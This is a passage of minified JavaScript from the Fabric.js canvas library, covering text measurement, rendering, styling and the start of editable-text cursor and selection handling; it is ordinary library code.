Props"})},setPathInfo:function(){var y=this.path;y&&(y.segmentsInfo=g.util.getPathSegmentsInfo(y.path))},getMeasuringContext:function(){return g._measuringContext||(g._measuringContext=this.canvas&&this.canvas.contextCache||g.util.createCanvasElement().getContext("2d")),g._measuringContext},_splitText:function(){var y=this._splitTextIntoLines(this.text);return this.textLines=y.lines,this._textLines=y.graphemeLines,this._unwrappedTextLines=y._unwrappedLines,this._text=y.graphemeText,y},initDimensions:function(){this.__skipDimension||(this._splitText(),this._clearCache(),this.path?(this.width=this.path.width,this.height=this.path.height):(this.width=this.calcTextWidth()||this.cursorWidth||this.MIN_TEXT_WIDTH,this.height=this.calcTextHeight()),-1!==this.textAlign.indexOf("justify")&&this.enlargeSpaces(),this.saveState({propertySet:"_dimensionAffectingProps"}))},enlargeSpaces:function(){for(var y,M,D,w,x,S,O=0,U=this._textLines.length;O<U;O++)if(("justify"===this.textAlign||O!==U-1&&!this.isEndOfWrapping(O))&&(D=0,w=this._textLines[O],(M=this.getLineWidth(O))<this.width&&(S=this.textLines[O].match(this._reSpacesAndTabs)))){y=(this.width-M)/S.length;for(var K=0,ee=w.length;K<=ee;K++)x=this.__charBounds[O][K],this._reSpaceAndTab.test(w[K])?(x.width+=y,x.kernedWidth+=y,x.left+=D,D+=y):x.left+=D}},isEndOfWrapping:function(y){return y===this._textLines.length-1},missingNewlineOffset:function(){return 1},toString:function(){return"#<fabric.Text ("+this.complexity()+'): { "text": "'+this.text+'", "fontFamily": "'+this.fontFamily+'" }>'},_getCacheCanvasDimensions:function(){var y=this.callSuper("_getCacheCanvasDimensions"),M=this.fontSize;return y.width+=M*y.zoomX,y.height+=M*y.zoomY,y},_render:function(y){var M=this.path;M&&!M.isNotVisible()&&M._render(y),this._setTextStyles(y),this._renderTextLinesBackground(y),this._renderTextDecoration(y,"underline"),this._renderText(y),this._renderTextDecoration(y,"overline"),this._renderTextDecoration(y,"linethrough")},_renderText:function(y){"stroke"===this.paintFirst?(this._renderTextStroke(y),this._renderTextFill(y)):(this._renderTextFill(y),this._renderTextStroke(y))},_setTextStyles:function(y,M,p){if(y.textBaseline="alphabetical",this.path)switch(this.pathAlign){case"center":y.textBaseline="middle";break;case"ascender":y.textBaseline="top";break;case"descender":y.textBaseline="bottom"}y.font=this._getFontDeclaration(M,p)},calcTextWidth:function(){for(var y=this.getLineWidth(0),M=1,p=this._textLines.length;M<p;M++){var D=this.getLineWidth(M);D>y&&(y=D)}return y},_renderTextLine:function(y,M,p,D,w,x){this._renderChars(y,M,p,D,w,x)},_renderTextLinesBackground:function(y){if(this.textBackgroundColor||this.styleHas("textBackgroundColor")){for(var M,p,w,x,ee,se,le,D=y.fillStyle,S=this._getLeftOffset(),O=this._getTopOffset(),U=0,K=0,ve=this.path,ye=0,z=this._textLines.length;ye<z;ye++)if(M=this.getHeightOfLine(ye),this.textBackgroundColor||this.styleHas("textBackgroundColor",ye)){w=this._textLines[ye],p=this._getLineLeftOffset(ye),K=0,U=0,x=this.getValueOfPropertyAt(ye,0,"textBackgroundColor");for(var l=0,f=w.length;l<f;l++)ee=this.__charBounds[ye][l],se=this.getValueOfPropertyAt(ye,l,"textBackgroundColor"),ve?(y.save(),y.translate(ee.renderLeft,ee.renderTop),y.rotate(ee.angle),y.fillStyle=se,se&&y.fillRect(-ee.width/2,-M/this.lineHeight*(1-this._fontSizeFraction),ee.width,M/this.lineHeight),y.restore()):se!==x?(le=S+p+U,"rtl"===this.direction&&(le=this.width-le-K),y.fillStyle=x,x&&y.fillRect(le,O,K,M/this.lineHeight),U=ee.left,K=ee.width,x=se):K+=ee.kernedWidth;se&&!ve&&(le=S+p+U,"rtl"===this.direction&&(le=this.width-le-K),y.fillStyle=se,y.fillRect(le,O,K,M/this.lineHeight)),O+=M}else O+=M;y.fillStyle=D,this._removeShadow(y)}},getFontCache:function(y){var M=y.fontFamily.toLowerCase();g.charWidthsCache[M]||(g.charWidthsCache[M]={});var p=g.charWidthsCache[M],D=y.fontStyle.toLowerCase()+"_"+(y.fontWeight+"").toLowerCase();return p[D]||(p[D]={}),p[D]},_measureChar:function(y,M,p,D){var K,ee,se,le,w=this.getFontCache(M),O=p+y,U=this._getFontDeclaration(M)===this._getFontDeclaration(D),ve=M.fontSize/this.CACHE_FONT_SIZE;if(p&&void 0!==w[p]&&(se=w[p]),void 0!==w[y]&&(le=K=w[y]),U&&void 0!==w[O]&&(le=(ee=w[O])-se),void 0===K||void 0===se||void 0===ee){var ye=this.getMeasuringContext();this._setTextStyles(ye,M,!0)}return void 0===K&&(le=K=ye.measureText(y).width,w[y]=K),void 0===se&&U&&p&&(se=ye.measureText(p).width,w[p]=se),U&&void 0===ee&&(ee=ye.measureText(O).width,w[O]=ee,le=ee-se),{width:K*ve,kernedWidth:le*ve}},getHeightOfChar:function(y,M){return this.getValueOfPropertyAt(y,M,"fontSize")},measureLine:function(y){var M=this._measureLine(y);return 0!==this.charSpacing&&(M.width-=this._getWidthOfCharSpacing()),M.width<0&&(M.width=0),M},_measureLine:function(y){var p,D,x,S,ee,se,M=0,w=this._textLines[y],U=new Array(w.length),K=0,ve=this.path,le="right"===this.pathSide;for(this.__charBounds[y]=U,p=0;p<w.length;p++)S=this._getGraphemeBox(D=w[p],y,p,x),U[p]=S,M+=S.kernedWidth,x=D;if(U[p]={left:S?S.left+S.width:0,width:0,kernedWidth:0,height:this.fontSize},ve){switch(se=ve.segmentsInfo[ve.segmentsInfo.length-1].length,(ee=g.util.getPointOnPath(ve.path,0,ve.segmentsInfo)).x+=ve.pathOffset.x,ee.y+=ve.pathOffset.y,this.textAlign){case"left":K=le?se-M:0;break;case"center":K=(se-M)/2;break;case"right":K=le?0:se-M}for(K+=this.pathStartOffset*(le?-1:1),p=le?w.length-1:0;le?p>=0:p<w.length;le?p--:p++)K>se?K%=se:K<0&&(K+=se),this._setGraphemeOnPath(K,S=U[p],ee),K+=S.kernedWidth}return{width:M,numOfSpaces:0}},_setGraphemeOnPath:function(y,M,p){var w=this.path,x=g.util.getPointOnPath(w.path,y+M.kernedWidth/2,w.segmentsInfo);M.renderLeft=x.x-p.x,M.renderTop=x.y-p.y,M.angle=x.angle+("right"===this.pathSide?Math.PI:0)},_getGraphemeBox:function(y,M,p,D,w){var ee,x=this.getCompleteStyleDeclaration(M,p),S=D?this.getCompleteStyleDeclaration(M,p-1):{},O=this._measureChar(y,x,D,S),U=O.kernedWidth,K=O.width;0!==this.charSpacing&&(K+=ee=this._getWidthOfCharSpacing(),U+=ee);var se={width:K,left:0,height:x.fontSize,kernedWidth:U,deltaY:x.deltaY};if(p>0&&!w){var ve=this.__charBounds[M][p-1];se.left=ve.left+ve.width+O.kernedWidth-O.width}return se},getHeightOfLine:function(y){if(this.__lineHeights[y])return this.__lineHeights[y];for(var M=this._textLines[y],p=this.getHeightOfChar(y,0),D=1,w=M.length;D<w;D++)p=Math.max(this.getHeightOfChar(y,D),p);return this.__lineHeights[y]=p*this.lineHeight*this._fontSizeMult},calcTextHeight:function(){for(var y,M=0,p=0,D=this._textLines.length;p<D;p++)y=this.getHeightOfLine(p),M+=p===D-1?y/this.lineHeight:y;return M},_getLeftOffset:function(){return"ltr"===this.direction?-this.width/2:this.width/2},_getTopOffset:function(){return-this.height/2},_renderTextCommon:function(y,M){y.save();for(var p=0,D=this._getLeftOffset(),w=this._getTopOffset(),x=0,S=this._textLines.length;x<S;x++){var O=this.getHeightOfLine(x),U=O/this.lineHeight,K=this._getLineLeftOffset(x);this._renderTextLine(M,y,this._textLines[x],D+K,w+p+U,x),p+=O}y.restore()},_renderTextFill:function(y){!this.fill&&!this.styleHas("fill")||this._renderTextCommon(y,"fillText")},_renderTextStroke:function(y){(!this.stroke||0===this.strokeWidth)&&this.isEmptyStyles()||(this.shadow&&!this.shadow.affectStroke&&this._removeShadow(y),y.save(),this._setLineDash(y,this.strokeDashArray),y.beginPath(),this._renderTextCommon(y,"strokeText"),y.closePath(),y.restore())},_renderChars:function(y,M,p,D,w,x){var U,K,se,le,S=this.getHeightOfLine(x),O=-1!==this.textAlign.indexOf("justify"),ee="",ve=0,ye=this.path,z=!O&&0===this.charSpacing&&this.isEmptyStyles(x)&&!ye,l="ltr"===this.direction,f="ltr"===this.direction?1:-1,v=M.canvas.getAttribute("dir");if(M.save(),v!==this.direction&&(M.canvas.setAttribute("dir",l?"ltr":"rtl"),M.direction=l?"ltr":"rtl",M.textAlign=l?"left":"right"),w-=S*this._fontSizeFraction/this.lineHeight,z)return this._renderChar(y,M,x,0,p.join(""),D,w,S),void M.restore();for(var P=0,G=p.length-1;P<=G;P++)le=P===G||this.charSpacing||ye,ee+=p[P],se=this.__charBounds[x][P],0===ve?(D+=f*(se.kernedWidth-se.width),ve+=se.width):ve+=se.kernedWidth,O&&!le&&this._reSpaceAndTab.test(p[P])&&(le=!0),le||(U=U||this.getCompleteStyleDeclaration(x,P),K=this.getCompleteStyleDeclaration(x,P+1),le=g.util.hasStyleChanged(U,K,!1)),le&&(ye?(M.save(),M.translate(se.renderLeft,se.renderTop),M.rotate(se.angle),this._renderChar(y,M,x,P,ee,-ve/2,0,S),M.restore()):this._renderChar(y,M,x,P,ee,D,w,S),ee="",U=K,D+=f*ve,ve=0);M.restore()},_applyPatternGradientTransformText:function(y){var p,M=g.util.createCanvasElement(),D=this.width+this.strokeWidth,w=this.height+this.strokeWidth;return M.width=D,M.height=w,(p=M.getContext("2d")).beginPath(),p.moveTo(0,0),p.lineTo(D,0),p.lineTo(D,w),p.lineTo(0,w),p.closePath(),p.translate(D/2,w/2),p.fillStyle=y.toLive(p),this._applyPatternGradientTransform(p,y),p.fill(),p.createPattern(M,"no-repeat")},handleFiller:function(y,M,p){var D,w;return p.toLive?"percentage"===p.gradientUnits||p.gradientTransform||p.patternTransform?(y.translate(D=-this.width/2,w=-this.height/2),y[M]=this._applyPatternGradientTransformText(p),{offsetX:D,offsetY:w}):(y[M]=p.toLive(y,this),this._applyPatternGradientTransform(y,p)):(y[M]=p,{offsetX:0,offsetY:0})},_setStrokeStyles:function(y,M){return y.lineWidth=M.strokeWidth,y.lineCap=this.strokeLineCap,y.lineDashOffset=this.strokeDashOffset,y.lineJoin=this.strokeLineJoin,y.miterLimit=this.strokeMiterLimit,this.handleFiller(y,"strokeStyle",M.stroke)},_setFillStyles:function(y,M){return this.handleFiller(y,"fillStyle",M.fill)},_renderChar:function(y,M,p,D,w,x,S){var se,ve,O=this._getStyleDeclaration(p,D),U=this.getCompleteStyleDeclaration(p,D),K="fillText"===y&&U.fill,ee="strokeText"===y&&U.stroke&&U.strokeWidth;!ee&&!K||(M.save(),K&&(se=this._setFillStyles(M,U)),ee&&(ve=this._setStrokeStyles(M,U)),M.font=this._getFontDeclaration(U),O&&O.textBackgroundColor&&this._removeShadow(M),O&&O.deltaY&&(S+=O.deltaY),K&&M.fillText(w,x-se.offsetX,S-se.offsetY),ee&&M.strokeText(w,x-ve.offsetX,S-ve.offsetY),M.restore())},setSuperscript:function(y,M){return this._setScript(y,M,this.superscript)},setSubscript:function(y,M){return this._setScript(y,M,this.subscript)},_setScript:function(y,M,p){var D=this.get2DCursorLocation(y,!0),w=this.getValueOfPropertyAt(D.lineIndex,D.charIndex,"fontSize"),x=this.getValueOfPropertyAt(D.lineIndex,D.charIndex,"deltaY");return this.setSelectionStyles({fontSize:w*p.size,deltaY:x+w*p.baseline},y,M),this},_getLineLeftOffset:function(y){var M=this.getLineWidth(y),p=this.width-M,D=this.textAlign,w=this.direction,x=0,S=this.isEndOfWrapping(y);return"justify"===D||"justify-center"===D&&!S||"justify-right"===D&&!S||"justify-left"===D&&!S?0:("center"===D&&(x=p/2),"right"===D&&(x=p),"justify-center"===D&&(x=p/2),"justify-right"===D&&(x=p),"rtl"===w&&(x-=p),x)},_clearCache:function(){this.__lineWidths=[],this.__lineHeights=[],this.__charBounds=[]},_shouldClearDimensionCache:function(){var y=this._forceClearCache;return y||(y=this.hasStateChanged("_dimensionAffectingProps")),y&&(this.dirty=!0,this._forceClearCache=!1),y},getLineWidth:function(y){if(void 0!==this.__lineWidths[y])return this.__lineWidths[y];var p=this.measureLine(y).width;return this.__lineWidths[y]=p,p},_getWidthOfCharSpacing:function(){return 0!==this.charSpacing?this.fontSize*this.charSpacing/1e3:0},getValueOfPropertyAt:function(y,M,p){var D=this._getStyleDeclaration(y,M);return D&&void 0!==D[p]?D[p]:this[p]},_renderTextDecoration:function(y,M){if(this[M]||this.styleHas(M)){for(var p,D,w,x,S,O,U,K,ve,le,ye,z,l,f,A,v,ee=this._getLeftOffset(),se=this._getTopOffset(),P=this.path,G=this._getWidthOfCharSpacing(),X=this.offsets[M],L=0,h=this._textLines.length;L<h;L++)if(p=this.getHeightOfLine(L),this[M]||this.styleHas(M,L)){U=this._textLines[L],f=p/this.lineHeight,x=this._getLineLeftOffset(L),le=0,ye=0,K=this.getValueOfPropertyAt(L,0,M),v=this.getValueOfPropertyAt(L,0,"fill"),ve=se+f*(1-this._fontSizeFraction),D=this.getHeightOfChar(L,0),S=this.getValueOfPropertyAt(L,0,"deltaY");for(var R=0,J=U.length;R<J;R++)if(z=this.__charBounds[L][R],l=this.getValueOfPropertyAt(L,R,M),A=this.getValueOfPropertyAt(L,R,"fill"),w=this.getHeightOfChar(L,R),O=this.getValueOfPropertyAt(L,R,"deltaY"),P&&l&&A)y.save(),y.fillStyle=v,y.translate(z.renderLeft,z.renderTop),y.rotate(z.angle),y.fillRect(-z.kernedWidth/2,X*w+O,z.kernedWidth,this.fontSize/15),y.restore();else if((l!==K||A!==v||w!==D||O!==S)&&ye>0){var Z=ee+x+le;"rtl"===this.direction&&(Z=this.width-Z-ye),K&&v&&(y.fillStyle=v,y.fillRect(Z,ve+X*D+S,ye,this.fontSize/15)),le=z.left,ye=z.width,K=l,v=A,D=w,S=O}else ye+=z.kernedWidth;Z=ee+x+le,"rtl"===this.direction&&(Z=this.width-Z-ye),y.fillStyle=A,l&&A&&y.fillRect(Z,ve+X*D+S,ye-G,this.fontSize/15),se+=p}else se+=p;this._removeShadow(y)}},_getFontDeclaration:function(y,M){var p=y||this,D=this.fontFamily,w=g.Text.genericFonts.indexOf(D.toLowerCase())>-1,x=void 0===D||D.indexOf("'")>-1||D.indexOf(",")>-1||D.indexOf('"')>-1||w?p.fontFamily:'"'+p.fontFamily+'"';return[g.isLikelyNode?p.fontWeight:p.fontStyle,g.isLikelyNode?p.fontStyle:p.fontWeight,M?this.CACHE_FONT_SIZE+"px":p.fontSize+"px",x].join(" ")},render:function(y){!this.visible||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(this._shouldClearDimensionCache()&&this.initDimensions(),this.callSuper("render",y))},_splitTextIntoLines:function(y){for(var M=y.split(this._reNewline),p=new Array(M.length),D=["\n"],w=[],x=0;x<M.length;x++)p[x]=g.util.string.graphemeSplit(M[x]),w=w.concat(p[x],D);return w.pop(),{_unwrappedLines:p,lines:M,graphemeText:w,graphemeLines:p}},toObject:function(y){var M=_.concat(y),p=this.callSuper("toObject",M);return p.styles=g.util.stylesToArray(this.styles,this.text),p.path&&(p.path=this.path.toObject()),p},set:function(y,M){this.callSuper("set",y,M);var p=!1,D=!1;if("object"==typeof y)for(var w in y)"path"===w&&this.setPathInfo(),p=p||-1!==this._dimensionAffectingProps.indexOf(w),D=D||"path"===w;else p=-1!==this._dimensionAffectingProps.indexOf(y),D="path"===y;return D&&this.setPathInfo(),p&&(this.initDimensions(),this.setCoords()),this},complexity:function(){return 1}}),g.Text.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x y dx dy font-family font-style font-weight font-size letter-spacing text-decoration text-anchor".split(" ")),g.Text.DEFAULT_SVG_FONT_SIZE=16,g.Text.fromElement=function(y,M,p){if(!y)return M(null);var D=g.parseAttributes(y,g.Text.ATTRIBUTE_NAMES),w=D.textAnchor||"left";if((p=g.util.object.extend(p?b(p):{},D)).top=p.top||0,p.left=p.left||0,D.textDecoration){var x=D.textDecoration;-1!==x.indexOf("underline")&&(p.underline=!0),-1!==x.indexOf("overline")&&(p.overline=!0),-1!==x.indexOf("line-through")&&(p.linethrough=!0),delete p.textDecoration}"dx"in D&&(p.left+=D.dx),"dy"in D&&(p.top+=D.dy),"fontSize"in p||(p.fontSize=g.Text.DEFAULT_SVG_FONT_SIZE);var S="";"textContent"in y?S=y.textContent:"firstChild"in y&&null!==y.firstChild&&"data"in y.firstChild&&null!==y.firstChild.data&&(S=y.firstChild.data),S=S.replace(/^\s+|\s+$|\n+/g,"").replace(/\s+/g," ");var O=p.strokeWidth;p.strokeWidth=0;var U=new g.Text(S,p),K=U.getScaledHeight()/U.height,se=((U.height+U.strokeWidth)*U.lineHeight-U.height)*K,ve=U.getScaledHeight()+se,le=0;"center"===w&&(le=U.getScaledWidth()/2),"right"===w&&(le=U.getScaledWidth()),U.set({left:U.left-le,top:U.top-(ve-U.fontSize*(.07+U._fontSizeFraction))/U.lineHeight,strokeWidth:void 0!==O?O:1}),M(U)},g.Text.fromObject=function(y,M){var p=b(y),D=y.path;return delete p.path,g.Object._fromObject("Text",p,function(w){w.styles=g.util.stylesFromArray(y.styles,y.text),D?g.Object._fromObject("Path",D,function(x){w.set("path",x),M(w)},"path"):M(w)},"text")},g.Text.genericFonts=["sans-serif","serif","cursive","fantasy","monospace"],g.util.createAccessors&&g.util.createAccessors(g.Text)}}(we),j.util.object.extend(j.Text.prototype,{isEmptyStyles:function(E){if(!this.styles||void 0!==E&&!this.styles[E])return!0;var g=void 0===E?this.styles:{line:this.styles[E]};for(var b in g)for(var _ in g[b])for(var y in g[b][_])return!1;return!0},styleHas:function(E,g){if(!this.styles||!E||""===E||void 0!==g&&!this.styles[g])return!1;var b=void 0===g?this.styles:{0:this.styles[g]};for(var _ in b)for(var y in b[_])if(void 0!==b[_][y][E])return!0;return!1},cleanStyle:function(E){if(!this.styles||!E||""===E)return!1;var _,y,g=this.styles,b=0,M=!0,p=0;for(var w in g){for(var x in _=0,g[w]){var D;b++,(D=g[w][x]).hasOwnProperty(E)?(y?D[E]!==y&&(M=!1):y=D[E],D[E]===this[E]&&delete D[E]):M=!1,0!==Object.keys(D).length?_++:delete g[w][x]}0===_&&delete g[w]}for(var O=0;O<this._textLines.length;O++)p+=this._textLines[O].length;M&&b===p&&(this[E]=y,this.removeStyle(E))},removeStyle:function(E){if(this.styles&&E&&""!==E){var b,_,y,g=this.styles;for(_ in g){for(y in b=g[_])delete b[y][E],0===Object.keys(b[y]).length&&delete b[y];0===Object.keys(b).length&&delete g[_]}}},_extendStyles:function(E,g){var b=this.get2DCursorLocation(E);this._getLineStyle(b.lineIndex)||this._setLineStyle(b.lineIndex),this._getStyleDeclaration(b.lineIndex,b.charIndex)||this._setStyleDeclaration(b.lineIndex,b.charIndex,{}),j.util.object.extend(this._getStyleDeclaration(b.lineIndex,b.charIndex),g)},get2DCursorLocation:function(E,g){void 0===E&&(E=this.selectionStart);for(var b=g?this._unwrappedTextLines:this._textLines,_=b.length,y=0;y<_;y++){if(E<=b[y].length)return{lineIndex:y,charIndex:E};E-=b[y].length+this.missingNewlineOffset(y)}return{lineIndex:y-1,charIndex:b[y-1].length<E?b[y-1].length:E}},getSelectionStyles:function(E,g,b){void 0===E&&(E=this.selectionStart||0),void 0===g&&(g=this.selectionEnd||E);for(var _=[],y=E;y<g;y++)_.push(this.getStyleAtPosition(y,b));return _},getStyleAtPosition:function(E,g){var b=this.get2DCursorLocation(E);return(g?this.getCompleteStyleDeclaration(b.lineIndex,b.charIndex):this._getStyleDeclaration(b.lineIndex,b.charIndex))||{}},setSelectionStyles:function(E,g,b){void 0===g&&(g=this.selectionStart||0),void 0===b&&(b=this.selectionEnd||g);for(var _=g;_<b;_++)this._extendStyles(_,E);return this._forceClearCache=!0,this},_getStyleDeclaration:function(E,g){var b=this.styles&&this.styles[E];return b?b[g]:null},getCompleteStyleDeclaration:function(E,g){for(var y,b=this._getStyleDeclaration(E,g)||{},_={},M=0;M<this._styleProperties.length;M++)_[y=this._styleProperties[M]]=void 0===b[y]?this[y]:b[y];return _},_setStyleDeclaration:function(E,g,b){this.styles[E][g]=b},_deleteStyleDeclaration:function(E,g){delete this.styles[E][g]},_getLineStyle:function(E){return!!this.styles[E]},_setLineStyle:function(E){this.styles[E]={}},_deleteLineStyle:function(E){delete this.styles[E]}}),function(){function E(g){g.textDecoration&&(g.textDecoration.indexOf("underline")>-1&&(g.underline=!0),g.textDecoration.indexOf("line-through")>-1&&(g.linethrough=!0),g.textDecoration.indexOf("overline")>-1&&(g.overline=!0),delete g.textDecoration)}j.IText=j.util.createClass(j.Text,j.Observable,{type:"i-text",selectionStart:0,selectionEnd:0,selectionColor:"rgba(17,119,255,0.3)",isEditing:!1,editable:!0,editingBorderColor:"rgba(102,153,255,0.25)",cursorWidth:2,cursorColor:"",cursorDelay:1e3,cursorDuration:600,caching:!0,hiddenTextareaContainer:null,_reSpace:/\s|\n/,_currentCursorOpacity:0,_selectionDirection:null,_abortCursorAnimation:!1,__widthOfSpace:[],inCompositionMode:!1,initialize:function(g,b){this.callSuper("initialize",g,b),this.initBehavior()},setSelectionStart:function(g){g=Math.max(g,0),this._updateAndFire("selectionStart",g)},setSelectionEnd:function(g){g=Math.min(g,this.text.length),this._updateAndFire("selectionEnd",g)},_updateAndFire:function(g,b){this[g]!==b&&(this._fireSelectionChanged(),this[g]=b),this._updateTextarea()},_fireSelectionChanged:function(){this.fire("selection:changed"),this.canvas&&this.canvas.fire("text:selection:changed",{target:this})},initDimensions:function(){this.isEditing&&this.initDelayedCursor(),this.clearContextTop(),this.callSuper("initDimensions")},render:function(g){this.clearContextTop(),this.callSuper("render",g),this.cursorOffsetCache={},this.renderCursorOrSelection()},_render:function(g){this.callSuper("_render",g)},clearContextTop:function(g){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var b=this.canvas.contextTop,_=this.canvas.viewportTransform;b.save(),b.transform(_[0],_[1],_[2],_[3],_[4],_[5]),this.transform(b),this._clearTextArea(b),g||b.restore()}},renderCursorOrSelection:function(){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var g=this._getCursorBoundaries(),b=this.canvas.contextTop;this.clearContextTop(!0),this.selectionStart===this.selectionEnd?this.renderCursor(g,b):this.renderSelection(g,b),b.restore()}},_clearTextArea:function(g){var b=this.width+4,_=this.height+4;g.clearRect(-b/2,-_/2,b,_)},_getCursorBoundaries:function(g){void 0===g&&(g=this.selectionStart);var b=this._getLeftOffset(),_=this._getTopOffset(),y=this._getCursorBoundariesOffsets(g);return{left:b,top:_,leftOffset:y.left,topOffset:y.top}},_getCursorBoundariesOffsets:function(g){if(this.cursorOffsetCache&&"top"in this.cursorOffsetCache)return this.cursorOffsetCache;var b,_,y,D,M=0,p=0,w=this.get2DCursorLocation(g);y=w.charIndex,_=w.lineIndex;for(var x=0;x<_;x++)M+=this.getHeightOfLine(x);b=this._getLineLeftOffset(_);var S=this.__charBounds[_][y];return S&&(p=S.left),0!==this.charSpacing&&y===this._textLines[_].length&&(p-=this._getWidthOfCharSpacing()),D={top:M,left:b+(p>0?p:0)},"rtl"===this.direction&&(D.left*=-1),this.cursorOffsetCache=D,this.cursorOffsetCache},renderCursor:function(g,b){var _=this.get2DCursorLocation(),y=_.lineIndex,M=_.charIndex>0?_.charIndex-1:0,p=this.getValueOfPropertyAt(y,M,"fontSize"),D=this.scaleX*this.canvas.getZoom(),w=this.cursorWidth/D,x=g.topOffset,S=this.getValueOfPropertyAt(y,M,"deltaY");x+=(1-this._fontSizeFraction)*this.getHeightOfLine(y)/this.lineHeight-p*(1-this._fontSizeFraction),this.inCompositionMode&&this.renderSelection(g,b),b.fillStyle=this.cursorColor||this.getValueOfPropertyAt(y,M,"fill"),b.globalAlpha=this.__isMousedown?1:this._currentCursorOpacity,b.fillRect(g.left+g.leftOffset-w/2,x+g.top+S,w,p)},renderSelection:function(g,b){for(var _=this.inCompositionMode?this.hiddenTextarea.selectionStart:this.selectionStart,y=this.inCompositionMode?this.hiddenTextarea.selectionEnd:this.selectionEnd,M=-1!==this.textAlign.indexOf("justify"),p=this.get2DCursorLocation(_),D=this.get2DCursorLocation(y),w=p.lineIndex,x=D.lineIndex,S=p.charIndex<0?0:p.charIndex,O=D.charIndex<0?0:D.charIndex,U=w;U<=x;U++){var se,K=this._getLineLeftOffset(U)||0,ee=this.getHeightOfLine(U),ve=0,le=0;if(U===w&&(ve=this.__charBounds[w][S].left),U>=w&&U<x)le=M&&!this.isEndOfWrapping(U)?this.width:this.getLineWidth(U)||5;else if(U===x)if(0===O)le=this.__charBounds[x][O].left;else{var ye=this._getWidthOfCharSpacing();le=this.__charBounds[x][O-1].left+this.__charBounds[x][O-1].width-ye}se=ee,(this.lineHeight<1||U===x&&this.lineHeight>1)&&(ee/=this.lineHeight);var z=g.left+K+ve,l=le-ve,f=ee,A=0;this.inCompositionMode?(b.fillStyle=this.compositionColor||"black",f=1,A=ee):b.fillStyle=this.selectionColor,"rtl"===this.direction&&(z=this.width-z-l),b.fillRect(z,g.top+g.topOffset+A,l,f),g.topOffset+=se}},getCurrentCharFontSize:function(){var g=this._getCurrentCharIndex();return this.getValueOfPropertyAt(g.l,g.c,"fontSize")},getCurrentCharColor:function(){var g=this._getCurrentCharIndex();return this.getValueOfPropertyAt(g.l,g.c,"fill")},_getCurrentCharIndex:function(){var g=this.get2DCursorLocation(this.selectionStart,!0);return{l:g.lineIndex,c:g.charIndex>0?g.charIndex-1:0}}}),j.IText.fromObject=function(g,b){var _=j.util.stylesFromArray(g.styles,g.text),y=Object.assign({},g,{styles:_});if(E(y),y.styles)for(var M in y.styles)for(var p in y.styles[M])E(y.styles[M][p]);j.Object._fromObject("IText",y,b,"text")}}(),function(){var E=j.util.object.clone;j.util.object.extend(j.IText.prototype,{initBehavior:function(){this.initAddedHandler(),this.initRemovedHandler(),this.initCursorSelectionHandlers(),this.initDoubleClickSimulation(),this.mouseMoveHandler=this.mouseMoveHandler.bind(this)},onDeselect:function(){this.isEditing&&this.exitEditing(),this.selected=!1},initAddedHandler:function(){var g=this;this.on("added",function(){var b=g.canvas;b&&(b._hasITextHandlers||(b._hasITextHandlers=!0,g._initCanvasHandlers(b)),b._iTextInstances=b._iTextInstances||[],b._iTextInstances.push(g))})},initRemovedHandler:function(){var g=this;this.on("removed",function(){var b=g.canvas;b&&(b._iTextInstances=b._iTextInstances||[],j.util.removeFromArray(b._iTextInstances,g),0===b._iTextInstances.length&&(b._hasITextHandlers=!1,g._removeCanvasHandlers(b)))})},_initCanvasHandlers:function(g){g._mouseUpITextHandler=function(){g._iTextInstances&&g._iTextInstances.forEach(function(b){b.__isMousedown=!1})},g.on("mouse:up",g._mouseUpITextHandler)},_removeCanvasHandlers:function(g){g.off("mouse:up",g._mouseUpITextHandler)},_tick:function(){this._currentTickState=this._animateCursor(this,1,this.cursorDuration,"_onTickComplete")},_animateCursor:function(g,b,_,y){var M;return M={isAborted:!1,abort:function(){this.isAborted=!0}},g.animate("_currentCursorOpacity",b,{duration:_,onComplete:function(){M.isAborted||g[y]()},onChange:function(){g.canvas&&g.selectionStart===g.selectionEnd&&g.renderCursorOrSelection()},abort:function(){return M.isAborted}}),M},_onTickComplete:function(){var g=this;this._cursorTimeout1&&clearTimeout(this._cursorTimeout1),this._cursorTimeout1=setTimeout(function(){g._currentTickCompleteState=g._animateCursor(g,0,this.cursorDuration/2,"_tick")},100)},initDelayedCursor:function(g){var b=this,_=g?0:this.cursorDelay;this.abortCursorAnimation(),this._currentCursorOpacity=1,this._cursorTimeout2=setTimeout(function(){b._tick()},_)},abortCursorAnimation:function(){var g=this._currentTickState||this._currentTickCompleteState,b=this.canvas;this._currentTickState&&this._currentTickState.abort(),this._currentTickCompleteState&&this._currentTickCompleteState.abort(),clearTimeout(this._cursorTimeout1),clearTimeout(this._cursorTimeout2),this._currentCursorOpacity=0,g&&b&&b.clearContext(b.contextTop||b.contextContainer)},selectAll:function(){return this.selectionStart=0,this.selectionEnd=this._text.length,this._fireSelectionChanged(),this._updateTextarea(),this},getSelectedText:function(){return this._text.slice(this.selectionStart,this.selectionEnd).join("")},findWordBoundaryLeft:function(g){var b=0,_=g-1;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_--;for(;/\S/.test(this._text[_])&&_>-1;)b++,_--;return g-b},findWordBoundaryRight:function(g){var b=0,_=g;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_++;for(;/\S/.test(this._text[_])&&_<this._text.length;)b++,_++;return g+b},findLineBoundaryLeft:function(g){for(var b=0,_=g-1;!/\n/.test(this._text[_])&&_>-1;)b++,_--;return g-b},findLineBoundaryRight:function(g){for(var b=0,_=g;!/\n/.test(this._text[_])&&_<this._text.length;)b++,_++;return g+b},searchWordBoundary:function(g,b){for(var _=this._text,y=this._reSpace.test(_[g])?g-1:g,M=_[y],p=j.reNonWord;!p.test(M)&&y>0&&y<_.length;)M=_[y+=b];return p.test(M)&&(y+=1===b?0:1),y},selectWord:function(g){var b=this.searchWordBoundary(g=g||this.selectionStart,-1),_=this.searchWordBoundary(g,1);this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()},selectLine:function(g){var b=this.findLineBoundaryLeft(g=g||this.selectionStart),_=this.findLineBoundaryRight(g);return this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this},enterEditing:function(g){if(!this.isEditing&&this.editable)return 